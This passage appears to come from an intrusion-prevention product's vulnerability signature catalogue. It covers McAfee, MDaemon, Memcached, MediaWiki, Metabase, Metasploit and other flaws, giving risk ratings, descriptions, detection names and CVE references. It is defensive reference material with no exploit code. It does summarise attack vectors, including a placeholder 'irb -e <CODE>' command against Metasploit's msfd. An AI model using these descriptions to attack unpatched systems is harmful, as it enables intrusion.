There is a vulnerability in the way McAfee Antivirus Library parses LHA Type-2 archive files. The vulnerable archive parser does not perform sufficient bounds checking on the file name field and the directory name field in the header of LHA archive files before copying the field into a buffer, resulting in a buffer overflow. An attacker can exploit this vulnerability to execute arbitrary code in the SYSTEM context on the target system by sending a specially crafted LHA file to the target. Upon receiving a simple attack, the thread of the vulnerable product will crash when it try to scan the malicious LHA archive for known trojans or viruses, therefore an malicious LHA archive may be downloaded and stored on the local file system without the affected product raising a warning or otherwise informing the user of a potential threat. The product in such a case exhibits ineffective and misleading behaviour. In an attack that allows code execution, the target system's behaviour is entirely dependent on the intended purpose of the injected code. The code will execute with system privileges.

Situation:

File-Binary_McAfee-Multiple-Products-Lha-Type-2-File-Handling-Buffer-Overflow

References:

CVE-2005-0644
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0644

BID-12832
http://www.securityfocus.com/bid/12832

McAfee-NeoTrace-ActiveX-Control-TraceTarget-Method-Buffer-Overflow

About this vulnerability:

Buffer overflow vulnerability in McAfee NeoTrace

Risk:

Moderate

First detected in:

sgpkg-ips-115-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

McAfee NeoTrace

Type:

Buffer Overflow

Description:

There is a buffer overflow vulnerability in the NeoTrace ActiveX control. The vulnerability is due to a lack of input validation while processing user-supplied parameters for the ActiveX control.

Situation:

HTTP_SS-McAfee-NeoTrace-ActiveX-Control-TraceTarget-Method-Buffer-Overflow
File-Text_McAfee-NeoTrace-ActiveX-Control-TraceTarget-Method-Buffer-Overflow

References:

CVE-2006-6707
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6707

BID-21697
http://www.securityfocus.com/bid/21697

McAfee-Security-Center-Mcinsctl.dll-ActiveX-Control-File-Overwrite

About this vulnerability:

A vulnerability in McAfee Personal Firewall Plus

Risk:

High

First detected in:

sgpkg-ips-436-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

McAfee Security Center

Type:

Malfunction

Description:

A vulnerability exists in the McAfee Security Center product. The flaw is caused by a lack of implementation of domain-based access restrictions on the McLog ActiveX control provided by the affected product. A remote attacker may exploit this vulnerability via a specially crafted Web page to write arbitrary files on the target system. After successfully exploiting this vulnerability, a file on the target file system might be created, modified, or overwritten. An attacker may write a file to a startup folder in order to execute arbitrary code during the next reboot or logon session or overwrite credential files on the system in order to gain access to the system. Thus, the behaviour of the target depends on the intention of the attacker.

Situation:

File-Text_McAfee-Security-Center-Mcinsctl.dll-ActiveX-Control-File-Overwrite

References:

CVE-2005-3657
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3657

BID-15986
http://www.securityfocus.com/bid/15986

McAfee-Virtual-Technician-ActiveX-Control-Insecure-Method-Exposure

About this vulnerability:

A vulnerability in McAfee Virtual Technician

Risk:

High

First detected in:

sgpkg-ips-523-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

McAfee Virtual Technician; McAfee ePolicy Orchestrator

Type:

Malfunction

Description:

An insecure method exposure vulnerability has been reported in McAfee Virtual Technician. The vulnerability is due to exposing the Save() method in an ActiveX control defined in the McHealthCheck.dll, which allows creating and overwriting arbitrary files on the vulnerable system with an XML file. Remote attackers can exploit this vulnerability by enticing a target user to open a crafted web page. Successful exploitation could result in corruption of files which might lead to a denial-of-service condition.

Situation:

File-Text_McAfee-Virtual-Technician-ActiveX-Control-Insecure-Method-Exposure

References:

CVE-2012-5879
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5879

BID-58750
http://www.securityfocus.com/bid/58750

OSVDB-91700
http://www.osvdb.org/91700

McAfee-Virtual-Technician-Mvt.mvtcontrol-ActiveX-Insecure-Method

About this vulnerability:

A vulnerability in McAfee Virtual Technician

Risk:

Moderate

First detected in:

sgpkg-ips-451-4333

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

McAfee Virtual Technician

Type:

Malfunction

Description:

An insecure method has been discovered in McAfee Virtual Technician. The vulnerability is due to a design weakness in the GetObject() method, which allows instantiation of an arbitrary object on the vulnerable system. Remote attackers can exploit this vulnerability by enticing a target user to open a crafted web page. Successful exploitation would result in execution of arbitrary code in the context of the currently logged-on user.

Situation:

File-Text_McAfee-Virtual-Technician-Mvt.mvtcontrol-ActiveX-Insecure-Method

References:

BID-53304
http://www.securityfocus.com/bid/53304

McAfee-Virtual-Technician-Remote-Code-Execution

About this vulnerability:

A McAfee Virtual Technician Remote Code Execution vulnerability.

Risk:

High

First detected in:

sgpkg-ips-764-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

McAfee Virtual Technician

Type:

Input Validation

Description:

A vulnerability in McAfee Virtual Technician, versions before 6.4, which allows remote attackers to execute arbitrary code or cause a denial of service condition by loading additional unsafe classes such as WScript.Shell

Situation:

File-Text_JavaScript-StringFromCharCode-Multiple-Encodings-Obfuscation

References:

CVE-2012-4598
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4598

OSVDB-81657
http://www.osvdb.org/81657

McAfee-VirusScan-On-Access-Scanner-Long-Unicode-Filename-Handling

About this vulnerability:

Buffer overflow vulnerability in McAfee VirusScan Enterprise

Risk:

High

First detected in:

sgpkg-ips-436-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

McAfee VirusScan Enterprise

Type:

Buffer Overflow

Description:

There is a heap buffer overflow vulnerability in McAfee VirusScan. The flaw is due to a boundary error when processing overly long file names that contain Unicode characters. A remote attacker can exploit this vulnerability by placing a file with a specially crafted name on the target system and enticing the user to access the file. Successful exploitation may allow arbitrary code execution in the security context of System.

Situation:

File-Binary_McAfee-VirusScan-On-Access-Scanner-Long-Unicode-Filename-Handling

References:

CVE-2007-2152
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2152

BID-23543
http://www.securityfocus.com/bid/23543

McAfee-Web-Reporter-Jboss-Ejbinvokerservlet-Marshalled-Object-Code-Execution

About this vulnerability:	A vulnerability in McAfee Web Reporter
Risk:	Moderate
First detected in:	sgpkg-ips-547-5211
Last changed:	sgpkg-ips-1396-5242
Platform:	Generic
Software:	McAfee Web Reporter
Type:	Malfunction
Description:	There is a code execution vulnerability in McAfee Web Reporter due to embedding a vulnerable version of JBoss. The vulnerability is due to a misconfiguration error when handling certain HTTP requests containing marshalled Java objects. A remote unauthenticated attacker could exploit this vulnerability to execute arbitrary code on McAfee Web Reporter with a vulnerable version of JBoss. Successful exploitation could result in arbitrary code being executed in the context of the vulnerable application which is System on Windows platforms.
Situation:	HTTP_CS-McAfee-Web-Reporter-Jboss-Ejbinvokerservlet-Marshalled-Object-Code-Execution

Mcrat-Botnet

About this vulnerability:	McRat Botnet
Risk:	High
First detected in:	sgpkg-ips-622-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	<os>
Type:	Code Injection
Description:	McRat is a malicious Remote Access Tool. It may steal data and passwords from the infected machine and try to install additional malware.
Situation:	Generic_SS-Mcrat-Botnet-Activity

MDaemon-IMAP-Command-Buffer-Overflow

About this vulnerability:

A vulnerability in MDaemon

Risk:

High

First detected in:

sgpkg-ips-409-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

MDaemon

Type:

Buffer Overflow

Description:

A vulnerability exists in the way the MDaemon mail server processes certain IMAP commands. Multiple overflows occur when an overly long argument is passed to the LIST command of IMAP protocol. Exploitation of this vulnerability may lead to a denial of service condition or possibly the execution of arbitrary code with system privileges.

Situation:

IMAP_MDaemon-IMAP-Command-Buffer-Overflow

References:

CVE-2004-1546
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1546

BID-11238
http://www.securityfocus.com/bid/11238

MDaemon-IMAP-Status-Command-BOF

About this vulnerability:

Buffer overflow in MDaemon IMAP Server

Risk:

High

First detected in:

sgpkg-ips-14-1102

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

MDaemon

Type:

Buffer Overflow

Description:

MDaemon mail server is vulnerable to a stack-based buffer overflow. An authenticated remote attacker could send a long string to the STATUS command of the IMAP component, to overflow the buffer and possibly execute arbitrary code on the server.

Situation:

IMAP_Excessively-Long-Mailbox-Name-Argument-In-IMAP-Status-Command

References:

CVE-2004-2292
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2292

BID-10366
http://www.securityfocus.com/bid/10366

MDaemon-Raw-Message-Handler-Buffer-Overflow

About this vulnerability:

A vulnerability in Alt-N Technologies MDaemon

Risk:

High

First detected in:

sgpkg-ips-370-4219

Last changed:

sgpkg-ips-1730-5242

Platform:

Windows

Software:

MDaemon

Type:

Buffer Overflow

Description:

MDaemon/WorldClient mail server may be prone to a buffer overflow vulnerability when handling messages with a long 'From' field. This issue may allow a remote attacker to execute arbitrary code in the context of the vulnerable software. The behaviour of the attack target depends on the data used to overrun the buffer. A normal attack without a code exploit will only cause a denial of service. However, if a skillful attacker includes a code exploit embedded in the attack request and the code is successfully executed, then the behaviour of target will be variable according to the function of the code.

Situation:

HTTP_CRL-MDaemon-HTTP-Raw-Message-Handler-Buffer-Overflow

References:

CVE-2003-1200
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1200

BID-9317
http://www.securityfocus.com/bid/9317

OSVDB-3255
http://www.osvdb.org/3255

MDaemon-SMTP-Command-Buffer-Overflow

About this vulnerability:

A vulnerability in MDaemon

Risk:

High

First detected in:

sgpkg-ips-409-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

MDaemon

Type:

Buffer Overflow

Description:

A vulnerability exists in the way the MDaemon mail server processes certain SMTP commands. A stack buffer overflow occurs when an overly long argument is passed to the SAML, SOML, SEND commands of the SMTP protocol. Exploitation of this vulnerability may lead to a denial of service condition or possibly the execution of arbitrary code with system privileges.

Situation:

SMTP_MDaemon-SMTP-Command-Buffer-Overflow

References:

CVE-2004-1546
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1546

BID-11238
http://www.securityfocus.com/bid/11238

OSVDB-10224
http://www.osvdb.org/10224

OSVDB-10223
http://www.osvdb.org/10223

Measuresoft-ScadaPro-Directory-Traversal

About this vulnerability:	A vulnerability in Measuresoft ScadaPro
Risk:	Moderate
First detected in:	sgpkg-ips-619-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	Measuresoft ScadaPro
Type:	Directory Traversal
Description:	A vulnerability in Measuresoft ScadaPro allows an external attacker to execute arbitrary commands in the target system.
Situation:	Generic_CS-Measuresoft-ScadaPro-Directory-Traversal Generic_UDP-Measuresoft-ScadaPro-Directory-Traversal

Measuresoft-ScadaPro-Remote-Code-Execution

About this vulnerability:

A vulnerability in Measuresoft ScadaPro

Risk:

Moderate

First detected in:

sgpkg-ips-619-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Measuresoft ScadaPro

Type:

Insecure Configuration

Description:

A vulnerability in Measuresoft ScadaPro allows an external attacker to execute arbitrary commands in the target system.

Situation:

Generic_CS-Measuresoft-ScadaPro-Remote-Code-Execution
Generic_UDP-Measuresoft-ScadaPro-Remote-Code-Execution

References:

CVE-2011-3497
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3497

BID-49613
http://www.securityfocus.com/bid/49613

OSVDB-75490
http://www.osvdb.org/75490

Measuresoft-ScadaPro-XF-Command-Execution

About this vulnerability:

An attempt to exploit vulnerability in Measuresoft ScadaPro

Risk:

Moderate

First detected in:

sgpkg-ips-426-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Measuresoft ScadaPro

Type:

Input Validation

Description:

Lack of proper input sanitation allows an attacker to run system commands

Situation:

Generic_CS-Measuresoft-ScadaPro-XF-Command-Execution

References:

CVE-2011-3490
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3490

OSVDB-75490
http://www.osvdb.org/75490

Media-Foundation-Memory-Corruption-CVE-2018-8251

About this vulnerability:

A vulnerability in Windows Media Foundation

Risk:

High

First detected in:

sgpkg-ips-1075-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Edge

Type:

Malfunction

Description:

There exists a memory corruption vulnerability in Windows Media Foundation. A remote attacker can use this to execute arbitrary code on the affected system.

Situation:

File-Text_Media-Foundation-Memory-Corruption-CVE-2018-8251

References:

CVE-2018-8251
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8251

ms18-jun
http://technet.microsoft.com/security/bulletin/ms18-jun

Media-Player-Network-Sharing-Service-Code-Execution-CVE-2010-3225

About this vulnerability:

A code execution vulnerability in Microsoft Windows Media Player

Risk:

Critical

First detected in:

sgpkg-ips-347-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Malfunction

Description:

There is a code execution vulnerability in Microsoft Windows Media Player.

Situation:

Generic_CS-Media-Player-Network-Sharing-Service-Code-Execution-CVE-2010-3225

References:

CVE-2010-3225
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3225

MS10-075
http://technet.microsoft.com/security/bulletin/MS10-075

Media-Services-Buffer-Overflow-CVE-2010-0478

About this vulnerability:

A vulnerability in Microsoft Windows Media Service 4.1

Risk:

High

First detected in:

sgpkg-ips-300-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows 2000

Software:

<os>

Type:

Buffer Overflow

Description:

There is a buffer overflow vulnerability in Microsoft Windows Media Service 4.1. When exploited successfully, the vulnerability allows remote code execution.

Situation:

Generic_CS-Media-Services-Buffer-Overflow-CVE-2010-0478
Generic_CS-Media-Services-Buffer-Overflow-Exploit-CVE-2010-0478
Generic_UDP-Media-Services-Buffer-Overflow-CVE-2010-0478

References:

CVE-2010-0478
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0478

MS10-025
http://technet.microsoft.com/security/bulletin/MS10-025

MediaWiki-CSS-Extension-Path-Traversal

About this vulnerability:

A vulnerability in Wikimedia Foundation Media Wiki CSS Extension

Risk:

Moderate

First detected in:

sgpkg-ips-1808-5242

Last changed:

sgpkg-ips-1808-5242

Platform:

Generic

Software:

MediaWiki

Type:

Input Validation

Description:

Improper handling of backslashes in URL paths when loading stylesheets causes a path traversal vulnerability in MediaWiki. A successful exploitation allows an attacker to access arbitrary files on the target system.

Situation:

HTTP_CRL-MediaWiki-CSS-Extension-Path-Traversal

References:

CVE-2024-47841
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-47841

MediaWiki-Script-Injection

About this vulnerability:

Cross-site scripting vulnerability in MediaWiki

Risk:

Moderate

First detected in:

sgpkg-ips-68-1314

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

MediaWiki

Type:

Cross-site Scripting

Description:

The MediaWiki product has a vulnerability in the parsing of user supplied data. Remote attacker is able to exploit this vulnerability to construct cross-site scripting attacks.

Situation:

HTTP_CS-MediaWiki-Script-Injection

References:

CVE-2006-2611
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2611

OSVDB-25713
http://www.osvdb.org/25713

MediaWiki-SyntaxHighlight-Extension-Option-Injection-Vulnerability

About this vulnerability:

A MediaWiki SyntaxHighlight Extension Option Injection vulnerability

Risk:

Moderate

First detected in:

sgpkg-ips-1023-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows; Linux; Mac OS X

Software:

MediaWiki

Type:

Cross-site Scripting

Description:

A vulnerability in MediaWiki SyntaxHighlight Extension, versions 1.27.x and 1.28.x, which allows remote attackers to create arbitrary files and execute arbitrary PHP code by specifying specially crafted options to the Pygments library.

Situation:

File-Text_MediaWiki-SyntaxHighlight-Extension-Option-Injection-Vulnerability

References:

CVE-2017-0372
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0372

MediaWiki-URI-Remote-Command-Execution

About this vulnerability:

A MediaWiki URI Remote Command Execution vulnerability.

Risk:

Moderate

First detected in:

sgpkg-ips-766-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

MediaWiki

Type:

Metacharacter Injection

Description:

A vulnerability in MediaWiki, versions 1.22.x before 1.22.2, 1.21.x before 1.21.5, and 1.19.x before 1.19.11, which allows remote attackers to execute arbitrary commands via shell metacharacters in several URLs, when DjVu or PDF file upload support is enabled.

Situation:

HTTP_CSU-MediaWiki-URI-Remote-Command-Execution

References:

CVE-2014-1610
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1610

OSVDB-102630
http://www.osvdb.org/102630

MegaRAC-Authentication-Bypass-Via-Redfish-CVE-2024-54085

About this vulnerability:

An attempt to exploit a vulnerability in MegaRAC detected

Risk:

High

First detected in:

sgpkg-ips-1852-5242

Last changed:

sgpkg-ips-1852-5242

Platform:

Generic

Software:

MegaRAC

Type:

Input Validation

Description:

AMI's SPx contains a vulnerability in the BMC where an attacker may bypass authentication remotely through the Redfish Host Interface. A successful exploitation of this vulnerability may lead to a loss of confidentiality, integrity, and/or availability.

Situation:

HTTP_CSH-MegaRAC-Authentication-Bypass-Via-Redfish-CVE-2024-54085

References:

CVE-2024-54085
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-54085

Memcached-Denial-Of-Service

About this vulnerability:

A Memcached Denial Of Service vulnerability.

Risk:

Moderate

First detected in:

sgpkg-ips-712-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Memcached

Type:

Input Validation

Description:

A vulnerability in Memcached, versions 1.4.5 and before, which allows remote attackers to execute arbitrary code, or cause a denial of service, via a large body length value.

Situation:

Generic_CS-Memcached-Denial-Of-Service

References:

CVE-2011-4971
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4971

OSVDB-92867
http://www.osvdb.org/92867

Memcached-Lru-Mode-And-Temp_TTL-Commands-Denial-of-Service

About this vulnerability:

A vulnerability in Memcached

Risk:

Moderate

First detected in:

sgpkg-ips-1170-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Memcached

Type:

Malfunction

Description:

There has been reported a denial-of-service vulnerability in Memcached. This vulnerability could be exploited by a remote attacker. Successful exploitation can lead in denial-of-service conditions.

Situation:

Generic_CS-Memcached-Lru-Mode-And-Temp_TTL-Commands-Denial-of-Service

References:

CVE-2019-11596
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11596

Memcached-Process_Bin_Append_Prepend-Integer-Overflow

About this vulnerability:

A vulnerability in Memcached Project Memcached

Risk:

Moderate

First detected in:

sgpkg-ips-830-5242

Last changed:

sgpkg-ips-1392-5242

Platform:

Generic

Software:

Memcached

Type:

Integer Overflow

Description:

Improper bounds check when processing append/prepend commands causes an integer overflow vulnerability in memcached. A successful exploitation allows an attacker to run code with the privileges of the daemon or cause a denial of service condition. This situation also covers CVE-2021-2389.

Situation:

Generic_CS-Memcached-Process_Bin_Append_Prepend-Integer-Overflow

References:

CVE-2016-8704
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-8704

Memcached-Process_Bin_SASL_Auth-Integer-Underflow

About this vulnerability:

A vulnerability in Memcached Project Memcached

Risk:

Moderate

First detected in:

sgpkg-ips-830-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Memcached

Type:

Integer Overflow

Description:

Improper checking of client commands when processing append/prepend commands causes an integer overflow vulnerability in memcached. A successful exploitation allows an attacker to run code with the privileges of the daemon or cause a denial of service condition.

Situation:

Generic_CS-Memcached-Process_Bin_SASL_Auth-Integer-Underflow

References:

CVE-2016-8706
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-8706

Memcached-Process_Bin_Update-Body_Len-Integer-Overflow

About this vulnerability:

A vulnerability in Memcached Project Memcached

Risk:

Moderate

First detected in:

sgpkg-ips-825-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Memcached

Type:

Integer Overflow

Description:

Improper validation of length values in client commands causes an integer overflow in the memcached daemon. This can allow an attacker to execute code or cause a denial of service condition on the target.

Situation:

Generic_CS-Memcached-Process_Bin_Update-Body_Len-Integer-Overflow

References:

CVE-2016-8705
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-8705

Memcached-Traffic-Amplification-UDP-Packet-Spoofing

About this vulnerability:

A vulnerability in Memcached Project Memcached

Risk:

Moderate

First detected in:

sgpkg-ips-1054-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Memcached

Type:

Malfunction

Description:

There has been reported a network traffic amplification vulnerability in memcached. Memcached is listening on UDP port 11211 by default. A remote attacker can launch DoS attacks by sending UDP packets with spoofed source addresses to UDP port of the target server.

Situation:

Generic_UDP-Memcached-Traffic-Amplification-UDP-Packet-Spoofing

References:

CVE-2018-1000115
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1000115

Memcached-Try_Read_Command_Binary-Stack-Buffer-Overflow

About this vulnerability:

A vulnerability in Memcached Project Memcached

Risk:

Moderate

First detected in:

sgpkg-ips-1240-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Memcached

Type:

Buffer Overflow

Description:

There has been reported a stack buffer overflow vulnerability in memcached. Successful exploitation could lead in arbitrary code execution.

Situation:

Generic_CS-Memcached-Try_Read_Command_Binary-Stack-Buffer-Overflow

References:

CVE-2020-10931
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10931

Memcached-Usage

About this vulnerability:	Use of memcached detected
Risk:	Moderate
First detected in:	sgpkg-ips-522-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Memcached
Type:	Insecure Configuration
Description:	Memcached is a distributed memory caching system which is often used to speed up databases.
Situation:	Generic_CS-Memcached-Set-Request Generic_CS-Memcached-Add-Request Generic_CS-Memcached-Get-Request Generic_SS-Memcached-Server-Error-Response

Mercantec-SoftCart-Cgi-Buffer-Overflow

About this vulnerability:

Buffer overflow in Mercantec SoftCart.exe

Risk:

High

First detected in:

sgpkg-ips-12-1102

Last changed:

sgpkg-ips-1637-5242

Platform:

BSD

Software:

Mercantec SoftCart

Type:

Buffer Overflow

Description:

The Mercantec SoftCart CGI executable is prone to a remotely exploitable buffer overflow. This may allow arbitrary code execution in the context of the hosting Web server. The issue is known to affect version 4.00b on BSDi/4.3 systems. Other releases may also be affected.

References:

CVE-2004-2221
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2221

BID-10926
http://www.securityfocus.com/bid/10926

OSVDB-9011
http://www.osvdb.org/9011

Mercury-Mail-Multiple-IMAP-Commands-BOF

About this vulnerability:

Multiple IMAP commands buffer overflows in Mercury Mail

Risk:

Moderate

First detected in:

sgpkg-ips-17-1210

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Mercury Mail Transport System

Type:

Buffer Overflow

Description:

Mercury Mail Transport System is vulnerable to a Denial of Service (DoS) attack, caused by a buffer overflow when handling certain commands. By supplying a specially-crafted command, such as: EXAMINE, SUBSCRIBE, STATUS, APPEND, CHECK, CLOSE, EXPUNGE, FETCH, DELETE, RENAME, LIST, SEARCH, CREATE and UNSUBSCRIBE, a remote attacker could overflow the buffer and cause the server to crash.

Situation:

References:

CVE-2004-1211
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1211

BID-11775
http://www.securityfocus.com/bid/11775

OSVDB-12508
http://www.osvdb.org/12508

Metabase-GeoJSON-URL-Local-File-Inclusion

About this vulnerability:

A vulnerability in Metabase

Risk:

Moderate

First detected in:

sgpkg-ips-1799-5242

Last changed:

sgpkg-ips-1799-5242

Platform:

Generic

Software:

Metabase

Type:

Input Validation

Description:

Improper URL validation causes a local file inclusion vulnerability in the GeoJSON component of Metabase.

Situation:

HTTP_CRL-Metabase-GeoJSON-URL-Local-File-Inclusion

References:

CVE-2021-41277
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-41277

Metabase-Remote-Code-Execution-CVE-2023-38646

About this vulnerability:

A vulnerability in Metabase

Risk:

High

First detected in:

sgpkg-ips-1617-5242

Last changed:

sgpkg-ips-1617-5242

Platform:

Generic

Software:

Metabase

Type:

Input Validation

Description:

A pre-authentication remote code execution vulnerability has been reported in Metabase Open Source and Metabase Enterprise.

Situation:

File-Text_Metabase-Remote-Code-Execution-CVE-2023-38646

References:

CVE-2023-38646
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-38646

Metamail-Format-String-Vulnerabilities

About this vulnerability:

A vulnerability in Metamail MetaMail

Risk:

Moderate

First detected in:

sgpkg-ips-409-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Metamail

Type:

Format String

Description:

Several vulnerabilities in MetaMail, a common MIME parser and application launcher for email clients, may allow remote attackers to execute arbitrary code. These vulnerabilities include two buffer overflows and two format-string issues. A successful attack will cause the metamail executable to terminate, or to execute code of the attack's choice in the execution context of metamail (usually inherited from the MUA, which in most cases runs with the user's credentials).

Situation:

E-Mail_HCS-Mail-To-Format-String
E-Mail_HCS-Mail-From-Format-String

References:

CVE-2004-0104
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0104

BID-9692
http://www.securityfocus.com/bid/9692

Metasploit-Handler-DoS

About this vulnerability:

A vulnerability in Metasploit

Risk:

High

First detected in:

sgpkg-ips-1213-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Metasploit

Type:

Resource Starvation

Description:

There exists a vulnerability in Metasploit, version 5.0.20, which allows remote attackers to cause a denial of service condition by sending a specially crafted HTTP request that gets added as a resource handler.

Situation:

HTTP_CSU-Metasploit-Handler-DoS

References:

CVE-2019-5645
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5645

Metasploit-JavaScript-Encryption

About this vulnerability:	An HTML obfuscation method used by Metasploit detected
Risk:	Low
First detected in:	sgpkg-ips-401-4219
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Generic HTTP client
Type:	Malfunction
Description:	HTML content that could be generated by Metasploit's EncryptJS obfuscation method was detected
Situation:	HTTP_SS-Metasploit-JavaScript-Encryption File-Text_Metasploit-JavaScript-Encryption

Metasploit-JavaScript-Escape-Evasion

About this vulnerability:	An HTML evasion method used by Metasploit detected
Risk:	Low
First detected in:	sgpkg-ips-399-4219
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Generic HTTP client
Type:	Malfunction
Description:	HTML content that could be generated by Metasploit's HTML::javascript::escape evasion was detected
Situation:	HTTP_SS-Metasploit-JavaScript-Escape-Evasion File-Text_Metasploit-JavaScript-Escape-Evasion

Metasploit-msfd-Browser-Remote-Code-Execution

About this vulnerability:	A vulnerability in Metasploit msfd
Risk:	High
First detected in:	sgpkg-ips-1127-5242
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Metasploit
Type:	Input Validation
Description:	A vulnerability in Metasploit msfd which allows remote attackers to connect to the msfd-socket through a victim's browser and execute msfconsole-commands.
Situation:	File-Text_Metasploit-msfd-Browser-Remote-Code-Execution

Metasploit-msfd-Remote-Code-Execution

About this vulnerability:	A Metasploit msfd Remote Code Execution Vulnerability
Risk:	High
First detected in:	sgpkg-ips-1074-5242
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Metasploit
Type:	Input Validation
Description:	A vulnerability in the msfd-service of Metasploit which allows remote attackers to execute arbitrary code via the msfconsole command: irb -e <CODE>.
Situation:	Generic_CS-Metasploit-msfd-Remote-Code-Execution

Metersphere-V1.15.4-Authenticated-SQL-Injection

About this vulnerability:

An attempt to exploit a vulnerability in MeterSphere v1.15.4 Authenticated SQL Injection detected

Risk:

High

First detected in:

sgpkg-ips-1832-5242

Last changed:

sgpkg-ips-1832-5242

Platform:

Generic

Software:

Metersphere

Type:

Malfunction

Description:

An attempt to exploit a vulnerability in MeterSphere v1.15.4 Authenticated SQL Injection detected.

Situation:

HTTP_CRL-Metersphere-V1.15.4-Authenticated-SQL-Injection

References:

CVE-2021-45788
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45788

MGI-LPViewer-LPControl-ActiveX-Control-Buffer-Overflow

About this vulnerability:

A vulnerability in MGI LPViewer LPControl ActiveX control

Risk:

High

First detected in:

sgpkg-ips-262-3038

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

MGI Systems LPViewer; iseemedia LPViewer

Type:

Buffer Overflow

Description:

There is a buffer overflow vulnerability in the MGI Systems LPViewer LPControl ActiveX control. The vulnerability is due to an error in a particular method exposed by the ActiveX control that suffers insufficient input validation. An exploitation may lead to arbitrary code execution in the context of the current user.

Situation:

HTTP_SS-MGI-LPViewer-LPControl-ActiveX-Control-Buffer-Overflow
File-Text_MGI-LPViewer-LPControl-ActiveX-Control-Buffer-Overflow

References:

CVE-2009-4384
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4384

BID-31604
http://www.securityfocus.com/bid/31604

OSVDB-48946
http://www.osvdb.org/48946

Micro-Focus-Groupwise-Admin-Console-Cross-Site-Scripting

About this vulnerability:

A vulnerability in Micro Focus GroupWise

Risk:

Moderate

First detected in:

sgpkg-ips-805-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Micro Focus GroupWise

Type:

Input Validation

Description:

Insufficient validation of URL parameters results in a cross-site scripting vulnerability in Micro Focus GroupWise. A successful exploitation allows an attacker to run arbitrary scripts in the user's browser.

Situation:

HTTP_CRL-Micro-Focus-Groupwise-Admin-Console-Cross-Site-Scripting

References:

CVE-2016-5760
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5760

Micro-Focus-Groupwise-Post-Office-Agent-Integer-Overflow

About this vulnerability:

A vulnerability in Micro Focus GroupWise

Risk:

Moderate

First detected in:

sgpkg-ips-800-5242

Last changed:

